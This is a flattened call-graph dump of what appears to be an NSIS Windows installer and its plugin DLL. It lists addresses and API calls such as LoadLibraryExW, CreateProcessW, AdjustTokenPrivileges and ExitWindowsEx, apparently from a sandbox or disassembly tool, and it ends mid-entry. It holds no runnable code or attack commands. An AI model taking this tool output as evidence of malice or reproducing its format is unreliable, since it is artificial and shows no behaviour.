5928 406521 lstrcpynW 5925->5928 5927->5922 5927->5923 5928->5927 5723 401e53 GetDC 5724 402d89 21 API calls 5723->5724 5725 401e65 GetDeviceCaps MulDiv ReleaseDC 5724->5725 5726 402d89 21 API calls 5725->5726 5727 401e96 5726->5727 5728 40655e 21 API calls 5727->5728 5729 401ed3 CreateFontIndirectW 5728->5729 5730 40263d 5729->5730 6028 402955 6029 402dab 21 API calls 6028->6029 6030 402961 6029->6030 6031 402977 6030->6031 6032 402dab 21 API calls 6030->6032 6033 405fec 2 API calls 6031->6033 6032->6031 6034 40297d 6033->6034 6056 406011 GetFileAttributesW CreateFileW 6034->6056 6036 40298a 6037 402a40 6036->6037 6040 4029a5 GlobalAlloc 6036->6040 6041 402a28 6036->6041 6038 402a47 DeleteFileW 6037->6038 6039 402a5a 6037->6039 6038->6039 6040->6041 6042 4029be 6040->6042 6043 4032b9 39 API calls 6041->6043 6057 4034b4 SetFilePointer 6042->6057 6045 402a35 CloseHandle 6043->6045 6045->6037 6046 4029c4 6047 40349e ReadFile 6046->6047 6048 4029cd GlobalAlloc 6047->6048 6049 402a11 6048->6049 6050 4029dd 6048->6050 6052 4060c3 WriteFile 6049->6052 6051 4032b9 39 API calls 6050->6051 6053 4029ea 6051->6053 6054 402a1d GlobalFree 6052->6054 6055 402a08 GlobalFree 6053->6055 6054->6041 6055->6049 6056->6036 6057->6046 6058 73f710e1 6068 73f71111 6058->6068 6059 73f712b0 GlobalFree 6060 73f71240 GlobalFree 6060->6068 6061 73f711d7 GlobalAlloc 6061->6068 6062 73f712ab 6062->6059 6063 73f7135a 2 API calls 6063->6068 6064 73f71312 2 API calls 6064->6068 6065 73f7129a GlobalFree 6065->6068 6066 73f7116b GlobalAlloc 6066->6068 6067 73f71381 lstrcpyW 6067->6068 6068->6059 6068->6060 6068->6061 6068->6062 6068->6063 6068->6064 6068->6065 6068->6066 6068->6067 6285 4045d6 lstrcpynW lstrlenW 5205 4014d7 5206 402d89 21 API calls 5205->5206 5207 4014dd Sleep 5206->5207 5209 402c2f 5207->5209 6069 40195b 6070 402dab 21 API calls 6069->6070 6071 401962 lstrlenW 6070->6071 6072 40263d 6071->6072 5502 4020dd 5503 4021a1 5502->5503 5504 4020ef 5502->5504 5506 401423 28 API calls 5503->5506 5505 402dab 21 API calls 5504->5505 5507 4020f6 5505->5507 5512 4022fb 5506->5512 5508 402dab 21 API calls 5507->5508 5509 4020ff 5508->5509 5510 402115 LoadLibraryExW 5509->5510 5511 402107 GetModuleHandleW 5509->5511 5510->5503 5513 402126 5510->5513 5511->5510 5511->5513 5525 406984 5513->5525 5516 402170 5518 4055a6 28 API calls 5516->5518 5517 402137 5519 402156 5517->5519 5520 40213f 5517->5520 5522 402147 5518->5522 5530 73f71817 5519->5530 5521 401423 28 API calls 5520->5521 5521->5522 5522->5512 5523 402193 FreeLibrary 5522->5523 5523->5512 5572 406543 WideCharToMultiByte 5525->5572 5527 4069a1 5528 4069a8 GetProcAddress 5527->5528 5529 402131 5527->5529 5528->5529 5529->5516 5529->5517 5531 73f7184a 5530->5531 5573 73f71bff 5531->5573 5533 73f71851 5534 73f71976 5533->5534 5535 73f71862 5533->5535 5536 73f71869 5533->5536 5534->5522 5623 73f7243e 5535->5623 5607 73f72480 5536->5607 5541 73f718af 5636 73f72655 5541->5636 5542 73f718cd 5545 73f718d3 5542->5545 5546 73f7191e 5542->5546 5543 73f7187f 5548 73f71885 5543->5548 5553 73f71890 5543->5553 5544 73f71898 5560 73f7188e 5544->5560 5633 73f72e23 5544->5633 5655 73f71666 5545->5655 5551 73f72655 10 API calls 5546->5551 5548->5560 5617 73f72b98 5548->5617 5561 73f7190f 5551->5561 5552 73f718b5 5647 73f71654 5552->5647 5627 73f72810 5553->5627 5558 73f71896 5558->5560 5559 73f72655 10 API calls 5559->5561 5560->5541 5560->5542 5563 73f71965 5561->5563 5661 73f72618 5561->5661 5563->5534 5565 73f7196f GlobalFree 5563->5565 5565->5534 5569 73f71951 5569->5563 5665 73f715dd wsprintfW 5569->5665 5571 73f7194a FreeLibrary 5571->5569 5572->5527 5668 73f712bb GlobalAlloc 5573->5668 5575 73f71c26 5669 73f712bb GlobalAlloc 5575->5669 5577 73f71e6b GlobalFree GlobalFree GlobalFree 5578 73f71e88 5577->5578 5599 73f71ed2 5577->5599 5579 73f7227e 5578->5579 5587 73f71e9d 5578->5587 5578->5599 5581 73f722a0 GetModuleHandleW 5579->5581 5579->5599 5580 73f71d26 GlobalAlloc 5593 73f71c31 5580->5593 5584 73f722c6 5581->5584 5585 73f722b1 LoadLibraryW 5581->5585 5582 73f71d71 lstrcpyW 5586 73f71d7b lstrcpyW 5582->5586 5583 73f71d8f GlobalFree 5583->5593 5676 73f716bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5584->5676 5585->5584 5585->5599 5586->5593 5587->5599 5672 73f712cc 5587->5672 5589 73f72126 5675 73f712bb GlobalAlloc 5589->5675 5590 73f72318 5592 73f72325 lstrlenW 5590->5592 5590->5599 5677 73f716bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5592->5677 5593->5577 5593->5580 5593->5582 5593->5583 5593->5586 5593->5589 5597 73f72067 GlobalFree 5593->5597 5598 73f721ae 5593->5598 5593->5599 5601 73f712cc 2 API calls 5593->5601 5602 73f71dcd 5593->5602 5595 73f722d8 5595->5590 5605 73f72302 GetProcAddress 5595->5605 5597->5593 5598->5599 5604 73f72216 lstrcpyW 5598->5604 5599->5533 5600 73f7233f 5600->5599 5601->5593 5602->5593 5670 73f7162f GlobalSize GlobalAlloc 5602->5670 5604->5599 5605->5590 5606 73f7212f 5606->5533 5613 73f72498 5607->5613 5609 73f725c1 GlobalFree 5612 73f7186f 5609->5612 5609->5613 5610 73f72540 GlobalAlloc WideCharToMultiByte 5610->5609 5611 73f7256b GlobalAlloc CLSIDFromString 5611->5609 5612->5543 5612->5544 5612->5560 5613->5609 5613->5610 5613->5611 5614 73f712cc GlobalAlloc lstrcpynW 5613->5614 5616 73f7258a 5613->5616 5679 73f7135a 5613->5679 5614->5613 5616->5609 5683 73f727a4 5616->5683 5618 73f72baa 5617->5618 5619 73f72c4f ReadFile 5618->5619 5622 73f72c6d 5619->5622 5621 73f72d39 5621->5560 5686 73f72b42 5622->5686 5624 73f72453 5623->5624 5625 73f7245e GlobalAlloc 5624->5625 5626 73f71868 5624->5626 5625->5624 5626->5536 5631 73f72840 5627->5631 5628 73f728ee 5630 73f728f4 GlobalSize 5628->5630 5632 73f728fe 5628->5632 5629 73f728db GlobalAlloc 5629->5632 5630->5632 5631->5628 5631->5629 5632->5558 5635 73f72e2e 5633->5635 5634 73f72e6e GlobalFree 5635->5634 5690 73f712bb GlobalAlloc 5636->5690 5638 73f7270b lstrcpynW 5643 73f7265f 5638->5643 5639 73f726fa StringFromGUID2 5639->5643 5640 73f726d8 MultiByteToWideChar 5640->5643 5641 73f72742 GlobalFree 5641->5643 5642 73f7271e wsprintfW 5642->5643 5643->5638 5643->5639 5643->5640 5643->5641 5643->5642 5644 73f72777 GlobalFree 5643->5644 5645 73f71312 2 API calls 5643->5645 5691 73f71381 5643->5691 5644->5552 5645->5643 5695 73f712bb GlobalAlloc 5647->5695 5649 73f71659 5650 73f71666 2 API calls 5649->5650 5651 73f71663 5650->5651 5652 73f71312 5651->5652 5653 73f71355 GlobalFree 5652->5653 5654 73f7131b GlobalAlloc lstrcpynW 5652->5654 5653->5561 5654->5653 5656 73f71672 wsprintfW 5655->5656 5659 73f7169f lstrcpyW 5655->5659 5660 73f716b8 5656->5660 5659->5660 5660->5559 5662 73f72626 5661->5662 5663 73f71931 5661->5663 5662->5663 5664 73f72642 GlobalFree 5662->5664 5663->5569 5663->5571 5664->5662 5666 73f71312 2 API calls 5665->5666 5667 73f715fe 5666->5667 5667->5563 5668->5575 5669->5593 5671 73f7164d 5670->5671 5671->5602 5678 73f712bb GlobalAlloc 5672->5678 5674 73f712db lstrcpynW 5674->5599 5675->5606 5676->5595 5677->5600 5678->5674 5680 73f71361 5679->5680 5681 73f712cc 2 API calls 5680->5681 5682 73f7137f 5681->5682 5682->5613 5684 73f727b2 VirtualAlloc 5683->5684 5685 73f72808 5683->5685 5684->5685 5685->5616 5687 73f72b4d 5686->5687 5688 73f72b52 GetLastError 5687->5688 5689 73f72b5d 5687->5689 5688->5689 5689->5621 5690->5643 5692 73f713ac 5691->5692 5693 73f7138a 5691->5693 5692->5643 5693->5692 5694 73f71390 lstrcpyW 5693->5694 5694->5692 5695->5649 5731 73f723e9 5732 73f72453 5731->5732 5733 73f7245e GlobalAlloc 5732->5733 5734 73f7247d 5732->5734 5733->5732 6073 402b5e 6074 402bb0 6073->6074 6075 402b65 6073->6075 6076 406915 5 API calls 6074->6076 6077 402d89 21 API calls 6075->6077 6078 402bae 6075->6078 6079 402bb7 6076->6079 6081 402b73 6077->6081 6080 402dab 21 API calls 6079->6080 6082 402bc0 6080->6082 6083 402d89 21 API calls 6081->6083 6082->6078 6084 402bc4 IIDFromString 6082->6084 6086 402b7f 6083->6086 6084->6078 6085 402bd3 6084->6085 6085->6078 6091 406521 lstrcpynW 6085->6091 6090 406468 wsprintfW 6086->6090 6088 402bf0 CoTaskMemFree 6088->6078 6090->6078 6091->6088 5735 40465f 5737 404677 5735->5737 5739 404791 5735->5739 5736 4047fb 5738 4048c5 5736->5738 5740 404805 GetDlgItem 5736->5740 5741 4044a0 22 API calls 5737->5741 5746 404507 8 API calls 5738->5746 5739->5736 5739->5738 5744 4047cc GetDlgItem SendMessageW 5739->5744 5742 404886 5740->5742 5743 40481f 5740->5743 5745 4046de 5741->5745 5742->5738 5748 404898 5742->5748 5743->5742 5747 404845 SendMessageW LoadCursorW SetCursor 5743->5747 5768 4044c2 KiUserCallbackDispatcher 5744->5768 5750 4044a0 22 API calls 5745->5750 5751 4048c0 5746->5751 5772 40490e 5747->5772 5753 4048ae 5748->5753 5754 40489e SendMessageW 5748->5754 5756 4046eb CheckDlgButton 5750->5756 5753->5751 5758 4048b4 SendMessageW 5753->5758 5754->5753 5755 4047f6 5769 4048ea 5755->5769 5766 4044c2 KiUserCallbackDispatcher 5756->5766 5758->5751 5761 404709 GetDlgItem 5767 4044d5 SendMessageW 5761->5767 5763 40471f SendMessageW 5764 404745 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5763->5764 5765 40473c GetSysColor 5763->5765 5764->5751 5765->5764 5766->5761 5767->5763 5768->5755 5770 4048f8 5769->5770 5771 4048fd SendMessageW 5769->5771 5770->5771 5771->5736 5775 405b47 ShellExecuteExW 5772->5775 5774 404874 LoadCursorW SetCursor 5774->5742 5775->5774 5776 402a60 5777 402d89 21 API calls 5776->5777 5778 402a66 5777->5778 5779 402aa9 5778->5779 5780 402a8d 5778->5780 5786 402933 5778->5786 5783 402ac3 5779->5783 5784 402ab3 5779->5784 5781 402a92 5780->5781 5782 402aa3 5780->5782 5790 406521 lstrcpynW 5781->5790 5782->5786 5791 406468 wsprintfW 5782->5791 5787 40655e 21 API calls 5783->5787 5785 402d89 21 API calls 5784->5785 5785->5782 5787->5782 5790->5786 5791->5786 4743 401761 4744 402dab 21 API calls 4743->4744 4745 401768 4744->4745 4749 406040 4745->4749 4747 40176f 4748 406040 2 API calls 4747->4748 4748->4747 4750 40604d GetTickCount GetTempFileNameW 4749->4750 4751 406087 4750->4751 4752 406083 4750->4752 4751->4747 4752->4750 4752->4751 6092 401d62 6093 402d89 21 API calls 6092->6093 6094 401d73 SetWindowLongW 6093->6094 6095 402c2f 6094->6095 4862 401ee3 4870 402d89 4862->4870 4864 401ee9 4865 402d89 21 API calls 4864->4865 4866 401ef5 4865->4866 4867 401f01 ShowWindow 4866->4867 4868 401f0c EnableWindow 4866->4868 4869 402c2f 4867->4869 4868->4869 4871 40655e 21 API calls 4870->4871 4872 402d9e 4871->4872 4872->4864 5936 4028e3 5937 4028eb 5936->5937 5938 4028ef FindNextFileW 5937->5938 5940 402901 5937->5940 5939 402948 5938->5939 5938->5940 5942 406521 lstrcpynW 5939->5942 5942->5940 4873 4056e5 4874 405706 GetDlgItem GetDlgItem GetDlgItem 4873->4874 4875 40588f 4873->4875 4919 4044d5 SendMessageW 4874->4919 4877 4058c0 4875->4877 4878 405898 GetDlgItem CreateThread CloseHandle 4875->4878 4880 4058eb 4877->4880 4881 405910 4877->4881 4882 4058d7 ShowWindow ShowWindow 4877->4882 4878->4877 4922 405679 OleInitialize 4878->4922 4879 405776 4886 40577d GetClientRect GetSystemMetrics SendMessageW SendMessageW 4879->4886 4883 4058f7 4880->4883 4884 40594b 4880->4884 4885 404507 8 API calls 4881->4885 4921 4044d5 SendMessageW 4882->4921 4888 405925 ShowWindow 4883->4888 4889 4058ff 4883->4889 4884->4881 4894 405959 SendMessageW 4884->4894 4901 40591e 4885->4901 4892 4057eb 4886->4892 4893 4057cf SendMessageW SendMessageW 4886->4893 4890 405945 4888->4890 4891 405937 4888->4891 4895 404479 SendMessageW 4889->4895 4897 404479 SendMessageW 4890->4897 4896 4055a6 28 API calls 4891->4896 4898 4057f0 SendMessageW 4892->4898 4899 4057fe 4892->4899 4893->4892 4900 405972 CreatePopupMenu 4894->4900 4894->4901 4895->4881 4896->4890 4897->4884 4898->4899 4903 4044a0 22 API calls 4899->4903 4902 40655e 21 API calls 4900->4902 4904 405982 AppendMenuW 4902->4904 4905 40580e 4903->4905 4906 4059b2 TrackPopupMenu 4904->4906 4907 40599f GetWindowRect 4904->4907 4908 405817 ShowWindow 4905->4908 4909 40584b GetDlgItem SendMessageW 4905->4909 4906->4901 4911 4059cd 4906->4911 4907->4906 4912 40583a 4908->4912 4913 40582d ShowWindow 4908->4913 4909->4901 4910 405872 SendMessageW SendMessageW 4909->4910 4910->4901 4914 4059e9 SendMessageW 4911->4914 4920 4044d5 SendMessageW 4912->4920 4913->4912 4914->4914 4915 405a06 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4914->4915 4917 405a2b SendMessageW 4915->4917 4917->4917 4918 405a54 GlobalUnlock SetClipboardData CloseClipboard 4917->4918 4918->4901 4919->4879 4920->4909 4921->4880 4923 4044ec SendMessageW 4922->4923 4926 40569c 4923->4926 4924 4056c3 4925 4044ec SendMessageW 4924->4925 4927 4056d5 OleUninitialize 4925->4927 4926->4924 4928 401389 2 API calls 4926->4928 4928->4926 5943 404ce7 5944 404d13 5943->5944 5945 404cf7 5943->5945 5947 404d46 5944->5947 5948 404d19 SHGetPathFromIDListW 5944->5948 5954 405b65 GetDlgItemTextW 5945->5954 5950 404d30 SendMessageW 5948->5950 5951 404d29 5948->5951 5949 404d04 SendMessageW 5949->5944 5950->5947 5952 40140b 2 API calls 5951->5952 5952->5950 5954->5949 6096 401568 6097 402ba9 6096->6097 6100 406468 wsprintfW 6097->6100 6099 402bae 6100->6099 6101 40196d 6102 402d89 21 API calls 6101->6102 6103 401974 6102->6103 6104 402d89 21 API calls 6103->6104 6105 401981 6104->6105 6106 402dab 21 API calls 6105->6106 6107 401998 lstrlenW 6106->6107 6108 4019a9 6107->6108 6112 4019ea 6108->6112 6113 406521 lstrcpynW 6108->6113 6110 4019da 6111 4019df lstrlenW 6110->6111 6110->6112 6111->6112 6113->6110 5792 40166f 5793 402dab 21 API calls 5792->5793 5794 401675 5793->5794 5795 40687e 2 API calls 5794->5795 5796 40167b 5795->5796 6286 73f71058 6288 73f71074 6286->6288 6287 73f710dd 6288->6287 6289 73f715b6 GlobalFree 6288->6289 6290 73f71092 6288->6290 6289->6290 6291 73f715b6 GlobalFree 6290->6291 6292 73f710a2 6291->6292 6293 73f710b2 6292->6293 6294 73f710a9 GlobalSize 6292->6294 6295 73f710b6 GlobalAlloc 6293->6295 6296 73f710c7 6293->6296 6294->6293 6297 73f715dd 3 API calls 6295->6297 6298 73f710d2 GlobalFree 6296->6298 6297->6296 6298->6287 5955 402af0 5956 402d89 21 API calls 5955->5956 5958 402af6 5956->5958 5957 402933 5958->5957 5959 40655e 21 API calls 5958->5959 5959->5957 5960 4026f1 5961 402d89 21 API calls 5960->5961 5962 402700 5961->5962 5963 40274a ReadFile 5962->5963 5964 406094 ReadFile 5962->5964 5965 4060f2 5 API calls 5962->5965 5966 40278a MultiByteToWideChar 5962->5966 5967 40283f 5962->5967 5969 4027b0 SetFilePointer MultiByteToWideChar 5962->5969 5970 402850 5962->5970 5972 40283d 5962->5972 5963->5962 5963->5972 5964->5962 5965->5962 5966->5962 5973 406468 wsprintfW 5967->5973 5969->5962 5971 402871 SetFilePointer 5970->5971 5970->5972 5971->5972 5973->5972 5160 401774 5161 402dab 21 API calls 5160->5161 5162 40177b 5161->5162 5163 4017a3 5162->5163 5164 40179b 5162->5164 5200 406521 lstrcpynW 5163->5200 5199 406521 lstrcpynW 5164->5199 5167 4017a1 5170 4067cf 5 API calls 5167->5170 5168 4017ae 5169 405df0 3 API calls 5168->5169 5171 4017b4 lstrcatW 5169->5171 5187 4017c0 5170->5187 5171->5167 5172 40687e 2 API calls 5172->5187 5173 405fec 2 API calls 5173->5187 5175 4017d2 CompareFileTime 5175->5187 5176 401892 5177 4055a6 28 API calls 5176->5177 5180 40189c 5177->5180 5178 401869 5181 4055a6 28 API calls 5178->5181 5188 40187e 5178->5188 5179 406521 lstrcpynW 5179->5187 5182 4032b9 39 API calls 5180->5182 5181->5188 5183 4018af 5182->5183 5184 4018c3 SetFileTime 5183->5184 5186 4018d5 CloseHandle 5183->5186 5184->5186 5185 40655e 21 API calls 5185->5187 5186->5188 5189 4018e6 5186->5189 5187->5172 5187->5173 5187->5175 5187->5176 5187->5178 5187->5179 5187->5185 5198 406011 GetFileAttributesW CreateFileW 5187->5198 5201 405b81 5187->5201 5190 4018eb 5189->5190 5191 4018fe 5189->5191 5192 40655e 21 API calls 5190->5192 5193 40655e 21 API calls 5191->5193 5196 4018f3 lstrcatW 5192->5196 5194 401906 5193->5194 5194->5188 5197 405b81 MessageBoxIndirectW 5194->5197 5196->5194 5197->5188 5198->5187 5199->5167 5200->5168 5202 405b96 5201->5202 5203 405be2 5202->5203 5204 405baa MessageBoxIndirectW 5202->5204 5203->5187 5204->5203 5974 73f72d43 5975 73f72d5b 5974->5975 5976 73f7162f 2 API calls 5975->5976 5977 73f72d76 5976->5977 5978 4014f5 SetForegroundWindow 5979 402c2f 5978->5979 5811 401a77 5812 402d89 21 API calls 5811->5812 5813 401a80 5812->5813 5814 402d89 21 API calls 5813->5814 5815 401a25 5814->5815 5220 401578 5221 401591 5220->5221 5222 401588 ShowWindow 5220->5222 5223 402c2f 5221->5223 5224 40159f ShowWindow 5221->5224 5222->5221 5224->5223 5256 4023f9 5257 402dab 21 API calls 5256->5257 5258 402408 5257->5258 5259 402dab 21 API calls 5258->5259 5260 402411 5259->5260 5261 402dab 21 API calls 5260->5261 5262 40241b GetPrivateProfileStringW 5261->5262 6299 401ffb 6300 402dab 21 API calls 6299->6300 6301 402002 6300->6301 6302 40687e 2 API calls 6301->6302 6303 402008 6302->6303 6305 402019 6303->6305 6306 406468 wsprintfW 6303->6306 6306->6305 5267 4034fc SetErrorMode GetVersionExW 5268 403550 GetVersionExW 5267->5268 5269 403588 5267->5269 5268->5269 5270 406915 5 API calls 5269->5270 5271 4035df 5269->5271 5270->5271 5272 4068a5 3 API calls 5271->5272 5273 4035f5 lstrlenA 5272->5273 5273->5271 5274 403605 5273->5274 5275 406915 5 API calls 5274->5275 5276 40360c 5275->5276 5277 406915 5 API calls 5276->5277 5278 403613 5277->5278 5279 406915 5 API calls 5278->5279 5280 40361f #17 OleInitialize SHGetFileInfoW 5279->5280 5356 406521 lstrcpynW 5280->5356 5283 40366e GetCommandLineW 5357 406521 lstrcpynW 5283->5357 5285 403680 5286 405e1d CharNextW 5285->5286 5287 4036a6 CharNextW 5286->5287 5292 4036b8 5287->5292 5288 4037ba 5289 4037ce GetTempPathW 5288->5289 5358 4034cb 5289->5358 5291 4037e6 5293 403840 DeleteFileW 5291->5293 5294 4037ea GetWindowsDirectoryW lstrcatW 5291->5294 5292->5288 5295 405e1d CharNextW 5292->5295 5301 4037bc 5292->5301 5368 403082 GetTickCount GetModuleFileNameW 5293->5368 5296 4034cb 12 API calls 5294->5296 5295->5292 5299 403806 5296->5299 5298 403854 5302 4038fb 5298->5302 5307 405e1d CharNextW 5298->5307 5348 40390b 5298->5348 5299->5293 5300 40380a GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 5299->5300 5304 4034cb 12 API calls 5300->5304 5452 406521 lstrcpynW 5301->5452 5396 403bf3 5302->5396 5309 403838 5304->5309 5321 403873 5307->5321 5309->5293 5309->5348 5310 403a59 5312 405b81 MessageBoxIndirectW 5310->5312 5311 403a7d 5313 403b01 ExitProcess 5311->5313 5314 403a85 GetCurrentProcess OpenProcessToken 5311->5314 5316 403a67 ExitProcess 5312->5316 5317 403ad1 5314->5317 5318 403a9d LookupPrivilegeValueW AdjustTokenPrivileges 5314->5318 5323 406915 5 API calls 5317->5323 5318->5317 5319 4038d1 5324 405ef8 18 API calls 5319->5324 5320 403914 5322 405aec 5 API calls 5320->5322 5321->5319 5321->5320 5325 403919 lstrlenW 5322->5325 5326 403ad8 5323->5326 5327 4038dd 5324->5327 5455 406521 lstrcpynW 5325->5455 5329 403aed ExitWindowsEx 5326->5329 5331 403afa 5326->5331 5327->5348 5453 406521 lstrcpynW 5327->5453 5329->5313 5329->5331 5330 403933 5335 40394b 5330->5335 5456 406521 lstrcpynW 5330->5456 5333 40140b 2 API calls 5331->5333 5333->5313 5334 4038f0 5454 406521 lstrcpynW 5334->5454 5338 403971 wsprintfW 5335->5338 5339 40655e 21 API calls 5338->5339 5340 403995 5339->5340 5353 40399d 5340->5353 5341 405a75 2 API calls 5341->5353 5342 405acf 2 API calls 5342->5353 5343 4039e7 SetCurrentDirectoryW 5345 4062e1 40 API calls 5343->5345 5344 4039ad GetFileAttributesW 5346 4039b9 DeleteFileW 5344->5346 5344->5353 5347 4039f6 CopyFileW 5345->5347 5346->5353 5347->5348 5347->5353 5460 403b19 5348->5460 5349 405c2d 71 API calls 5349->5353 5350 4062e1 40 API calls 5350->5353 5351 40655e 21 API calls 5351->5353 5353->5335 5353->5338 5353->5341 5353->5342 5353->5343 5353->5344 5353->5348 5353->5349 5353->5350 5353->5351 5354 403a6f CloseHandle 5353->5354 5355 40687e 2 API calls 5353->5355 5457 405b04 CreateProcessW 5353->5457 5354->5348 5355->5353 5356->5283 5357->5285 5359 4067cf 5 API calls 5358->5359 5360 4034d7 5359->5360 5361 4034e1 5360->5361 5362 405df0 3 API calls 5360->5362 5361->5291 5363 4034e9 5362->5363 5364 405acf 2 API calls 5363->5364 5365 4034ef 5364->5365 5366 406040 2 API calls 5365->5366 5367 4034fa 5366->5367 5367->5291 5467 406011 GetFileAttributesW CreateFileW 5368->5467 5370 4030c2 5388 4030d2 5370->5388 5468 406521 lstrcpynW 5370->5468 5372 4030e8 5373 405e3c 2 API calls 5372->5373 5374 4030ee 5373->5374 5469 406521 lstrcpynW 5374->5469 5376 4030f9 GetFileSize 5377 4031f3 5376->5377 5390 403110 5376->5390 5470 40301e 5377->5470 5379 4031fc 5381 40322c GlobalAlloc 5379->5381 5379->5388 5482 4034b4 SetFilePointer 5379->5482 5380 40349e ReadFile 5380->5390 5481 4034b4 SetFilePointer 5381->5481 5383 40325f 5387 40301e 6 API calls 5383->5387 5385 403215 5389 40349e ReadFile 5385->5389 5386 403247 5391 4032b9 39 API calls 5386->5391 5387->5388 5388->5298 5392 403220 5389->5392 5390->5377 5390->5380 5390->5383 5390->5388 5393 40301e 6 API calls 5390->5393 5394 403253 5391->5394 5392->5381 5392->5388 5393->5390 5394->5388 5394->5394 5395 403290 SetFilePointer 5394->5395 5395->5388 5397 406915 5 API calls 5396->5397 5398 403c07 5397->5398 5399 403c0d 5398->5399 5400 403c1f 5398->5400 5495 406468 wsprintfW 5399->5495 5401 4063ef 3 API calls 5400->5401 5402 403c4f 5401->5402 5404 403c6e lstrcatW 5402->5404 5406 4063ef 3 API calls 5402->5406 5405 403c1d 5404->5405 5487 403ec9 5405->5487 5406->5404 5409 405ef8 18 API calls 5410 403ca0 5409->5410 5411 403d34 5410->5411 5413 4063ef 3 API calls 5410->5413 5412 405ef8 18 API calls 5411->5412 5415 403d3a 5412->5415 5416 403cd2 5413->5416 5414 403d4a LoadImageW 5418 403df0 5414->5418 5419 403d71 RegisterClassW 5414->5419 5415->5414 5417 40655e 21 API calls 5415->5417 5416->5411 5420 403cf3 lstrlenW 5416->5420 5423 405e1d CharNextW 5416->5423 5417->5414 5422 40140b 2 API calls 5418->5422 5421 403da7 SystemParametersInfoW CreateWindowExW 5419->5421 5451 403dfa 5419->5451 5424 403d01 lstrcmpiW 5420->5424 5425 403d27 5420->5425 5421->5418 5426 403df6 5422->5426 5427 403cf0 5423->5427 5424->5425 5428 403d11 GetFileAttributesW 5424->5428 5429 405df0 3 API calls 5425->5429 5431 403ec9 22 API calls 5426->5431 5426->5451 5427->5420 5430 403d1d 5428->5430 5432 403d2d 5429->5432 5430->5425 5434 405e3c 2 API calls 5430->5434 5435 403e07 5431->5435 5496 406521 lstrcpynW 5432->5496 5434->5425 5436 403e13 ShowWindow 5435->5436 5437 403e96 5435->5437 5438 4068a5 3 API calls 5436->5438 5439 405679 5 API calls 5437->5439 5440 403e2b 5438->5440 5441 403e9c 5439->5441 5442 403e39 GetClassInfoW 5440->5442 5445 4068a5 3 API calls 5440->5445 5443 403ea0 5441->5443 5444 403eb8 5441->5444 5447 403e63 DialogBoxParamW 5442->5447 5448 403e4d GetClassInfoW RegisterClassW 5442->5448 5449 40140b 2 API calls 5443->5449 5443->5451 5446 40140b 2 API calls 5444->5446 5445->5442 5446->5451 5450 40140b 2 API calls 5447->5450 5448->5447 5449->5451 5450->5451 5451->5348 5452->5289 5453->5334 5454->5302 5455->5330 5456->5335 5458 405b43 5457->5458 5459 405b37 CloseHandle 5457->5459 5458->5353 5459->5458 5461 403b31 5460->5461 5462 403b23 CloseHandle 5460->5462 5498 403b5e 5461->5498 5462->5461 5465 405c2d 71 API calls 5466 403a4c OleUninitialize 5465->5466 5466->5310 5466->5311 5467->5370 5468->5372 5469->5376 5471 403027 5470->5471 5472 40303f 5470->5472 5473 403030 DestroyWindow 5471->5473 5474 403037 5471->5474 5475 403047 5472->5475 5476 40304f GetTickCount 5472->5476 5473->5474 5474->5379 5483 406951 5475->5483 5477 403080 5476->5477 5478 40305d CreateDialogParamW ShowWindow 5476->5478 5477->5379 5478->5477 5481->5386 5482->5385 5484 40696e PeekMessageW 5483->5484 5485 406964 DispatchMessageW 5484->5485 5486 40304d 5484->5486 5485->5484 5486->5379 5488 403edd 5487->5488 5497 406468 wsprintfW 5488->5497 5490 403f4e 5491 403f82 22 API calls 5490->5491 5493 403f53 5491->5493 5492 403c7e 5492->5409 5493->5492 5494 40655e 21 API calls 5493->5494 5494->5493 5495->5405 5496->5411 5497->5490 5499 403b6c 5498->5499 5500 403b36 5499->5500 5501 403b71 FreeLibrary GlobalFree 5499->5501 5500->5465 5501->5500 5501->5501 6114 401b7c 6115 402dab 21 API calls 6114->6115 6116 401b83 6115->6116 6117 402d89 21 API calls 6116->6117 6118 401b8c wsprintfW 6117->6118 6119 402c2f 6118->6119 4613 401680 4627 402dab 4613->4627 4616 402dab 21 API calls 4617 401690 4616->4617 4618 402dab 21 API calls 4617->4618 4619 401699 MoveFileW 4618->4619 4620 4016a5 4619->4620 4621 4016ac 4619->4621 4640 401423 4620->4640 4625 4022fb 4621->4625 4633 40687e FindFirstFileW 4621->4633 4628 402db7 4627->4628 4643 40655e 4628->4643 4631 401687 4631->4616 4634 406894 FindClose 4633->4634 4635 4016bb 4633->4635 4634->4635 4635->4625 4636 4062e1 MoveFileExW 4635->4636 4637 406302 4636->4637 4638 4062f5 4636->4638 4637->4620 4694 406167 4638->4694 4732 4055a6 4640->4732 4658 406569 4643->4658 4644 4067b0 4645 402dd8 4644->4645 4682 406521 lstrcpynW 4644->4682 4645->4631 4660 4067cf 4645->4660 4647 406781 lstrlenW 4647->4658 4649 40667a GetSystemDirectoryW 4649->4658 4650 40655e 15 API calls 4650->4647 4653 406690 GetWindowsDirectoryW 4653->4658 4654 40655e 15 API calls 4654->4658 4655 406722 lstrcatW 4655->4658 4656 4067cf 5 API calls 4656->4658 4658->4644 4658->4647 4658->4649 4658->4650 4658->4653 4658->4654 4658->4655 4658->4656 4659 4066f2 SHGetPathFromIDListW CoTaskMemFree 4658->4659 4669 4063ef 4658->4669 4674 406915 GetModuleHandleA 4658->4674 4680 406468 wsprintfW 4658->4680 4681 406521 lstrcpynW 4658->4681 4659->4658 4661 4067dc 4660->4661 4663 406845 CharNextW 4661->4663 4665 406852 4661->4665 4667 406831 CharNextW 4661->4667 4668 406840 CharNextW 4661->4668 4690 405e1d 4661->4690 4662 406857 CharPrevW 4662->4665 4663->4661 4663->4665 4665->4662 4666 406878 4665->4666 4666->4631 4667->4661 4668->4663 4683 40638e 4669->4683 4672 406423 RegQueryValueExW RegCloseKey 4673 406453 4672->4673 4673->4658 4675 406931 4674->4675 4676 40693b GetProcAddress 4674->4676 4687 4068a5 GetSystemDirectoryW 4675->4687 4678 40694a 4676->4678 4678->4658 4679 406937 4679->4676 4679->4678 4680->4658 4681->4658 4682->4645 4684 40639d 4683->4684 4685 4063a1 4684->4685 4686 4063a6 RegOpenKeyExW 4684->4686 4685->4672 4685->4673 4686->4685 4688 4068c7 wsprintfW LoadLibraryExW 4687->4688 4688->4679 4691 405e23 4690->4691 4692 405e39 4691->4692 4693 405e2a CharNextW 4691->4693 4692->4661 4693->4691 4695 406197 4694->4695 4696 